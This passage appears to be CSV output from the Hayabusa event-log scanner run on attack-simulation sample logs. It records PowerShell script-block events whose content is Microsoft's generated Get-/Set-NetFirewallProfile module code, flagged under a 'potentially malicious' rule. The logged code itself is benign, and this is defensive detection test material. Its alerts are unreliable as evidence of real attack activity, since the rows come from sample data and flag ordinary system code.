$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallProfile' -Alias '*' function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSet",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.700 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 